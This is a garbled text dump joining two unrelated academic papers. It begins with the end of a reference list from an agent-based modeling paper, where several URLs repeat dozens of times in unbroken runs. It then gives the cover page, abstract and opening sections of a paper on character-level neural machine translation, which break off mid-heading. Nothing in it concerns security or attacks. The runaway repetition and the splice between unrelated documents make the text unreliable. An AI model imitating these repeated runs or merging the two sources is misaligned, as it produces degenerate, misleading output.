http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://www2.econ.iastate.edu/tesfatsi/NetLogoReLogoReview.LytinenRailsback2012.pdf http://dx.doi.org/10.1057/jos.2010.3 http://dx.doi.org/10.1111/j.2041-210X.2011.00168.x http://dx.doi.org/10.1016/j.envsoft.2014.01.029 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://education.exeter.ac.uk/download.php?id=10414 http://dx.doi.org/10.18564/jasss.1634 http://dx.doi.org/10.1177/0037549706073695 http://dx.doi.org/10.7717/peerj-cs.36 Reynolds CW. 1987. Flocks, herds and schools: a distributed behavioral model. ACM SIGGRAPH Computer Graphics 21(4):25–34 DOI 10.1145/37402.37406. Rollins ND, Barton CM, Bergin S, Janssen MA, Lee A. 2014. A computational model library for publishing model documentation and code. Environmental Modelling & Software 61:59–64 DOI 10.1016/j.envsoft.2014.06.022. Sallach D, Mellarkod V. 2005. Interpretive agents: A heatbug reference simulation. In: Proceedings of agent 2005 conference on generative social processes, models, and mechanisms. 693–705. Sanchez SM. 1999. ABC’s of output analysis. In: Simulation conference proceedings, 1999 winter. vol. 1. Piscataway: IEEE, 24–32. Sargent RG. 1976. Statistical analysis of simulation output data. ACM SIGSIM Simulation Digest 7(4):39–50 DOI 10.1145/1013610.807298. Shapiro SS, Wilk MB. 1965. An analysis of variance test for normality (complete samples). Biometrika 52(3/4):591–611 DOI 10.1093/biomet/52.3-4.591. Shook E, Wang S, Tang W. 2013. A communication-aware framework for parallel spatially explicit agent-based models. International Journal of Geographical Information Science 27(11):2160–2181 DOI 10.1080/13658816.2013.771740. Smith M. 1991. Using massively-parallel supercomputers to model stochastic spatial predator-prey systems. Ecological Modelling 58(1):347–367 DOI 10.1016/0304-3800(91)90045-3. Sondahl F, Tisue S, Wilensky U. 2006. Breeding faster turtles: Progress towards a NetLogo compiler. In: Proceedings of the agent 2006 conference on social agents, Chicago, IL, USA. Available at https://ccl.northwestern.edu/papers/sond tis wil breeding.pdf. Standish RK. 2008. Going stupid with EcoLab. Simulation 84(12):611–618 DOI 10.1177/0037549708097146. Tang W, Wang S. 2009. HPABM: a hierarchical parallel simulation framework for spatially-explicit agent-based models. Transactions in GIS 13(3):315–333 DOI 10.1111/j.1467-9671.2009.01161.x. Tatara E, North M, Howe T, Collier N, Vos J. 2006. An introduction to Repast modeling using a simple predator-prey example. In: Sallach DL, Macal CM, North MJ, eds. Proceedings of the agent 2006 conference on social agents: results and prospects, vol. ANL/DIS-06-7. Chicago: Argonne National Laboratory and The University of Chicago, 83–94. Volterra V. 1926. Fluctuations in the abundance of a species considered mathematically. Nature 118:558–560 DOI 10.1038/118558a0. Welch PD. 1981. On the problem of the initial transient in steady-state simulation. Yorktown Heights: IBM Watson Research Center. Wilensky U. 1997. NetLogo wolf sheep predation model. Available at http://ccl.northwestern.edu/ netlogo/models/WolfSheepPredation. Wilensky U. 1999. NetLogo. Available at https://ccl.northwestern.edu/netlogo/. Wilensky U. 2004. NetLogo heatbugs model. Available at http://ccl.northwestern.edu/netlogo/ models/Heatbugs. Wilensky U. 2014. NetLogo 5.1.0 user manual. Evanston: Northwestern University. Available at http://ccl.northwestern.edu/netlogo/docs/. Wilensky U, Rand W. 2007. Making models match: replicating an agent-based model. Journal of Artificial Societies and Social Simulation 10(4):2. Willink R. 2005. A confidence interval and test for the mean of an asymmetric distribution. Com- munications in Statistics—Theory and Methods 34(4):753–766 DOI 10.1081/STA-200054419. Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 27/27 https://peerj.com/computer-science/ http://dx.doi.org/10.1145/37402.37406 http://dx.doi.org/10.1016/j.envsoft.2014.06.022 http://dx.doi.org/10.1145/1013610.807298 http://dx.doi.org/10.1093/biomet/52.3-4.591 http://dx.doi.org/10.1080/13658816.2013.771740 http://dx.doi.org/10.1016/0304-3800(91)90045-3 https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf http://dx.doi.org/10.1177/0037549708097146 http://dx.doi.org/10.1111/j.1467-9671.2009.01161.x http://dx.doi.org/10.1038/118558a0 http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation http://ccl.northwestern.edu/netlogo/models/WolfSheepPredation https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/models/Heatbugs http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://dx.doi.org/10.1081/STA-200054419 http://dx.doi.org/10.7717/peerj-cs.36 Towards a standard model for research in agent-based modeling and simulation Introduction Background Methodology Overview, design concepts and details of PPHPC A NetLogo implementation Selection of focal measures Collecting and preparing data for statistical analysis Statistical analysis of focal measures Results Determining the steady-state truncation point Analyzing the distributions of focal measures Discussion Conclusion References work_u2itmvi23nfwjgk64b2kurj7xy ---- Research Collection Journal Article Fully character-level neural machine translation without explicit segmentation Author(s): Lee, Jason; Cho, Kyunghyun; Hofmann, Thomas Publication Date: 2017-10 Permanent Link: https://doi.org/10.3929/ethz-b-000236131 Rights / License: Creative Commons Attribution 4.0 International This page was generated automatically upon download from the ETH Zurich Research Collection. For more information please consult the Terms of use. ETH Library https://doi.org/10.3929/ethz-b-000236131 http://creativecommons.org/licenses/by/4.0/ https://www.research-collection.ethz.ch https://www.research-collection.ethz.ch/terms-of-use Fully Character-Level Neural Machine Translation without Explicit Segmentation Jason Lee∗ ETH Zürich jasonlee@inf.ethz.ch Kyunghyun Cho New York University kyunghyun.cho@nyu.edu Thomas Hofmann ETH Zürich thomas.hofmann@inf.ethz.ch Abstract Most existing machine translation systems op- erate at the level of words, relying on ex- plicit segmentation to extract tokens. We in- troduce a neural machine translation (NMT) model that maps a source character sequence to a target character sequence without any seg- mentation. We employ a character-level con- volutional network with max-pooling at the encoder to reduce the length of source rep- resentation, allowing the model to be trained at a speed comparable to subword-level mod- els while capturing local regularities. Our character-to-character model outperforms a recently proposed baseline with a subword- level encoder on WMT’15 DE-EN and CS- EN, and gives comparable performance on FI- EN and RU-EN. We then demonstrate that it is possible to share a single character- level encoder across multiple languages by training a model on a many-to-one transla- tion task. In this multilingual setting, the character-level encoder significantly outper- forms the subword-level encoder on all the language pairs. We observe that on CS-EN, FI-EN and RU-EN, the quality of the multilin- gual character-level translation even surpasses the models specifically trained on that lan- guage pair alone, both in terms of the BLEU score and human judgment. 1 Introduction Nearly all previous work in machine translation has been at the level of words. Aside from our intu- ∗The majority of this work was completed while the author was visiting New York University. itive understanding of word as a basic unit of mean- ing (Jackendoff, 1992), one reason behind this is that sequences are significantly longer when rep- resented in characters, compounding the problem of data sparsity and modeling long-range depen- dencies. This has driven NMT research to be al- most exclusively word-level (Bahdanau et al., 2015; Sutskever et al., 2014). Despite their remarkable success, word-level NMT models suffer from several major weaknesses. For one, they are unable to model rare, out-of- vocabulary words, making them limited in translat- ing languages with rich morphology such as Czech, Finnish and Turkish. If one uses a large vocabulary to combat this (Jean et al., 2015), the complexity of training and decoding grows linearly with respect to the target vocabulary size, leading to a vicious cycle. To address this, we present a fully character-level NMT model that maps a character sequence in a source language to a character sequence in a target language. We show that our model outperforms a baseline with a subword-level encoder on DE-EN and CS-EN, and achieves a comparable result on FI-EN and RU-EN. A purely character-level NMT model with a basic encoder was proposed as a base- line by Luong and Manning (2016), but training it was prohibitively slow. We were able to train our model at a reasonable speed by drastically reducing the length of source sentence representation using a stack of convolutional, pooling and highway layers. One advantage of character-level models is that they are better suited for multilingual translation than their word-level counterparts which require a separate word vocabulary for each language. We 365 Transactions of the Association for Computational Linguistics, vol. 5, pp. 365–378, 2017. Action Editor: Adam Lopez. Submission batch: 11/2016; Revision batch: 2/2017; Published 10/2017. c©2017 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. verify this by training a single model to translate four languages (German, Czech, Finnish and Rus- sian) to English. Our multilingual character-level model outperforms the subword-level baseline by a considerable margin in all four language pairs, strongly indicating that a character-level model is more flexible in assigning its capacity to different language pairs. Furthermore, we observe that our multilingual character-level translation even exceeds the quality of bilingual translation in three out of four language pairs, both in BLEU score metric and human evaluation. This demonstrates excel- lent parameter efficiency of character-level transla- tion in a multilingual setting. We also showcase our model’s ability to handle intra-sentence code- switching while performing language identification on the fly. The contributions of this work are twofold: we empirically show that (1) we can train character-to- character NMT model without any explicit segmen- tation; and (2) we can share a single character-level encoder across multiple languages to build a mul- tilingual translation system without increasing the model size. 2 Background: Attentional Neural Machine Translation Neural machine translation (NMT) is a recently proposed approach to machine translation that builds a single neural network which takes as an input, a source sentence X = (x1, . . . ,xTX ) and generates its translation Y = (y1, . . . ,yTY ), where xt and yt′ are source and target symbols (Bahdanau et al., 2015; Sutskever et al., 2014; Luong et al., 2015; Cho et al., 2014a). Attentional NMT models have three components: an encoder, a decoder and an attention mechanism. Encoder Given a source sentence X, the en- coder constructs a continuous representation that summarizes its meaning with a recurrent neural network (RNN). A bidirectional RNN is often implemented as proposed in (Bahdanau et al., 2015). A forward encoder reads the input sentence from left to right: −→ h t = −→ fenc ( Ex(xt), −→ h t−1 ) . Similarly, a backward encoder reads it from right to left: ←− h t = ←− fenc ( Ex(xt), ←− h t+1 ) , where Ex is the source embedding lookup table, and −→ fenc and←− fenc are recurrent activation functions such as long short-term memory units (LSTMs) (Hochreiter and Schmidhuber, 1997) or gated recurrent units (GRUs) (Cho et al., 2014b). The encoder constructs a set of continuous source sentence representations C by concatenating the forward and backward hid- den states at each timestep: C = { h1, . . . ,hTX } , where ht = [−→ h t; ←− h t ] . Attention First introduced in Bahdanau et al. (2015), the attention mechanism lets the decoder at- tend more to different source symbols for each target symbol. More concretely, it computes the context vector ct′ at each decoding time step t′ as a weighted sum of the source hidden states: ct′ = ∑TX t=1 αt′tht. Similarly to Chung et al. (2016) and Firat et al. (2016a), each attentional weight αt′t represents how relevant the t-th source token xt is to the t′-th target token yt′, and is computed as: αt′t = 1 Z exp ( score ( Ey(yt′−1),st′−1,ht )) , (1) where Z = ∑TX k=1 exp ( score(Ey(yt′−1),st′−1,hk) ) is the normalization constant. score() is a feed- forward neural network with a single hidden layer that scores how well the source symbol xt and the target symbol yt′ match. Ey is the target embedding lookup table and st′ is the target hidden state at time t′. Decoder Given a source context vector ct′, the de- coder computes its hidden state at time t′ as: st′ = fdec ( Ey(yt′−1),st′−1,ct′ ) . Then, a parametric func- tion outk() returns the conditional probability of the next target symbol being k: p(yt′ =k|y<t′,X) = 1 Z exp ( outk ( Ey(yt′−1),st′,ct′ )) (2) where Z is again the normalization constant: Z = ∑ j exp ( outj(Ey(yt′−1),st′,ct′) ) . Training The entire model can be trained end-to- end by minimizing the negative conditional log- 366 likelihood, which is defined as: L = − 1 N N∑ n=1 T (n) Y∑ t=1 log p(yt = y (n) t |y (n) <t ,X (n)), where N is the number of sentence pairs, and X(n) and y(n)t are the source sentence and the t-th target symbol in the n-th pair, respectively. 3 Fully 